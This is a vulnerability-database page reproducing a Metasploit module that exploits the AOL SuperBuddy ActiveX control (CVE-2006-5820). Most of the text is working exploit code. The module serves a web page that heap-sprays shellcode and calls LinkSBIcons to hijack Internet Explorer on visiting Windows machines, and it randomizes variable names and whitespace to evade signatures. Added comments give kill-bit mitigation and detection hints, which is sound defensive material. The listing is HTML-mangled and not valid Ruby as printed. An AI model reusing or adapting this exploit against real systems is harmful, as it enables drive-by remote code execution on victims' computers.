seebug | Root | SSV:6595
History: Apr 07, 2007 - 12:00 a.m.

AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)

2007-04-07 00:00:00
Root
www.seebug.org
9

0.604 Medium

EPSS

Percentile

97.5%

No description provided by source.


                                                
require \'msf/core\'

module Msf

# Metasploit browser-exploit module for the AOL Sb.SuperBuddy ActiveX control;
# the only reference listed in this file is CVE-2006-5820. It mixes in the
# framework's HTML HTTP-server support and answers each incoming request with
# a generated page (see on_request_uri).
#
# NOTE(review): this listing is an HTML extraction. Spaces appear as &nbsp;
# entities, quotes are backslash-escaped and some string escapes look damaged,
# so the text is not parseable Ruby as printed.
#
# Defensive notes:
# - The served page only matters to a browser that can instantiate the
#   'Sb.SuperBuddy.1' ProgID. Updating or removing the control, or setting the
#   Internet Explorer kill bit ("Compatibility Flags" = 0x400 under
#   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{<control CLSID - not given on this page>}),
#   prevents that instantiation.
# - Variable names, body text and whitespace are randomized per response, so
#   detection content should key on the stable strings (the ProgID and the
#   LinkSBIcons method name) and on the heap-spray shape of the script rather
#   than on exact bytes.
class&nbsp;Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons&nbsp;<&nbsp;Msf::Exploit::Remote

	include&nbsp;Exploit::Remote::HttpServer::HTML

	# Registers the module metadata with the framework: name, description,
	# license, authors, version, the CVE reference, payload constraints
	# (1024 bytes of space plus a bad-character list), the 'win' platform and
	# a single target (Windows XP SP0-SP2 / IE 6.0SP1 English).
	#
	# info - optional Hash of metadata merged in through update_info.
	def&nbsp;initialize(info&nbsp;=&nbsp;{})
		super(update_info(info,
			\'Name\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\'AOL&nbsp;Sb.Superbuddy&nbsp;vulnerability\',
			\'Description\'&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;%q{
				This&nbsp;module&nbsp;exploits&nbsp;a&nbsp;flaw&nbsp;in&nbsp;AOL&nbsp;Sb.SuperBuddy.&nbsp;We&nbsp;stole&nbsp;this&nbsp;code&nbsp;from&nbsp;a&nbsp;pre-existing&nbsp;metasploit&nbsp;module.
			},
			\'License\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;MSF_LICENSE,
			\'Author\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;
				[&nbsp;
					\'kradchad\',
					\'leetpete\'
				],
			\'Version\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\'0.1\',
			\'References\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;
				[
					[&nbsp;\'CVE\',&nbsp;\'CVE-2006-5820\']
				],
			\'Payload\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>
				{
					\'Space\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;1024,
					\'BadChars\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\"x00\",
	
				},
			\'Platform\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\'win\',
			# The single target's Ret value is used twice in on_request_uri: a
			# 16-bit word derived from it fills the sprayed strings, and the value
			# itself is the argument handed to LinkSBIcons.
			\'Targets\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>
				[
					[\'Windows&nbsp;XP&nbsp;SP0-SP2&nbsp;/&nbsp;IE&nbsp;6.0SP1&nbsp;English\',&nbsp;{\'Ret\'&nbsp;=>&nbsp;0x0c0c0c0c}&nbsp;]
				],
			\'DefaultTarget\'&nbsp;&nbsp;=>&nbsp;0))
	end

	# Always returns false.
	# NOTE(review): presumably this opts the module out of the framework's
	# automated target selection - confirm against the framework version in use.
	def&nbsp;autofilter
		false
	end
	
	# HTTP request handler: builds one HTML page per request and sends it to
	# the requesting client.
	#
	# cli     - the connected client; peerhost/peerport are read for the log line.
	# request - the incoming HTTP request (not read in this method).
	#
	# Returns early, sending nothing, when regenerate_payload yields nil.
	def&nbsp;on_request_uri(cli,&nbsp;request)

		#&nbsp;Re-generate&nbsp;the&nbsp;payload
		return&nbsp;if&nbsp;((p&nbsp;=&nbsp;regenerate_payload(cli))&nbsp;==&nbsp;nil)

		#&nbsp;Encode&nbsp;the&nbsp;shellcode
		# The encoded payload is converted to the escaped form that the page
		# later passes to JavaScript unescape().
		shellcode&nbsp;=&nbsp;Rex::Text.to_unescape(payload.encoded,&nbsp;Rex::Arch.endian(target.arch))
		
		#&nbsp;Get&nbsp;a&nbsp;unicode&nbsp;friendly&nbsp;version&nbsp;of&nbsp;the&nbsp;return&nbsp;address
		# Packs Ret as a little-endian 32-bit value and keeps the first four hex
		# digits, i.e. one 16-bit word for a %uXXXX escape.
		addr_word&nbsp;&nbsp;=&nbsp;[target.ret].pack(\'V\').unpack(\'H*\')[0][0,4]

		#&nbsp;Randomize&nbsp;the&nbsp;javascript&nbsp;variable&nbsp;names	
		# Each length argument is rand(30)+2, i.e. between 2 and 31. Identifiers
		# therefore differ on every response and are useless as signature anchors.
		var_buffer&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_shellcode&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_unescape&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_x&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_i&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_tic&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_toc&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		
		#&nbsp;Randomize&nbsp;HTML&nbsp;data
		html&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		
		#&nbsp;Build&nbsp;out&nbsp;the&nbsp;message
		# What the generated page does, as a guide for detection and triage:
		#  1. aliases unescape() and decodes the payload string with it;
		#  2. doubles a string built from the repeated %u word until it is longer
		#     than 0x100000 characters;
		#  3. stores 120 array entries, each a 0x100000-character filler prefix
		#     ending in the payload (a heap-spray pattern);
		#  4. instantiates ActiveXObject 'Sb.SuperBuddy.1' and calls LinkSBIcons
		#     with the numeric Ret value;
		#  5. on any script error (for example the control not being installed)
		#     redirects the window to about:blank.
		# Steps 2-4 contain the invariants a content signature can rely on.
		content&nbsp;=&nbsp;%Q|
<html>
<head>
	<script>
	try&nbsp;{
	
	var&nbsp;#{var_unescape}&nbsp;&nbsp;=&nbsp;unescape&nbsp;;
	var&nbsp;#{var_shellcode}&nbsp;=&nbsp;#{var_unescape}(&nbsp;\"#{shellcode}\"&nbsp;)&nbsp;;
	
	var&nbsp;#{var_buffer}&nbsp;=&nbsp;#{var_unescape}(&nbsp;\"%u#{addr_word}\"&nbsp;)&nbsp;;
	while&nbsp;(#{var_buffer}.length&nbsp;<=&nbsp;0x100000)&nbsp;#{var_buffer}+=#{var_buffer}&nbsp;;

	var&nbsp;#{var_x}&nbsp;=&nbsp;new&nbsp;Array()&nbsp;;	
	for&nbsp;(&nbsp;var&nbsp;#{var_i}&nbsp;=0&nbsp;;&nbsp;#{var_i}&nbsp;<&nbsp;120&nbsp;;&nbsp;#{var_i}++&nbsp;)&nbsp;{
		#{var_x}[&nbsp;#{var_i}&nbsp;]&nbsp;=&nbsp;		
			#{var_buffer}.substring(&nbsp;0&nbsp;,&nbsp;&nbsp;0x100000&nbsp;-&nbsp;#{var_shellcode}.length&nbsp;)&nbsp;+&nbsp;#{var_shellcode}&nbsp;;
	}
	
	
&nbsp;&nbsp;&nbsp;	var&nbsp;#{var_tic}&nbsp;=&nbsp;new&nbsp;ActiveXObject(&nbsp;\'Sb.SuperBuddy.1\'&nbsp;);	
	try&nbsp;{&nbsp;#{var_tic}.LinkSBIcons(&nbsp;#{target.ret}&nbsp;)&nbsp;;&nbsp;}&nbsp;catch(&nbsp;e&nbsp;)&nbsp;{&nbsp;}

	
	}&nbsp;catch(&nbsp;e&nbsp;)&nbsp;{&nbsp;window.location&nbsp;=&nbsp;\'about:blank\'&nbsp;;&nbsp;}
	
	</script>
</head>
<body>
#{html}
</body>
</html>		
		|

		#&nbsp;Randomize&nbsp;the&nbsp;whitespace&nbsp;in&nbsp;the&nbsp;document
		# Every match of the pattern is replaced by a run of 2 to 101 characters
		# picked at random from `set`. The layout therefore differs per response,
		# so byte-exact or whitespace-sensitive signatures will not match reliably.
		content.gsub!(/s+/)&nbsp;do&nbsp;|s|
			len&nbsp;=&nbsp;rand(100)+2
			set&nbsp;=&nbsp;\"x09x20x0dx0a\"
			buf&nbsp;=&nbsp;\'\'
			
			while&nbsp;(buf.length&nbsp;<&nbsp;len)
				buf&nbsp;<<&nbsp;set[rand(set.length)].chr
			end
			
			buf
		end
		
		# Logs the requesting client's address and port through print_status.
		print_status(\"Sending&nbsp;exploit&nbsp;to&nbsp;#{cli.peerhost}:#{cli.peerport}...\")

		#&nbsp;Transmit&nbsp;the&nbsp;response&nbsp;to&nbsp;the&nbsp;client
		send_response_html(cli,&nbsp;content)
	end

end

end
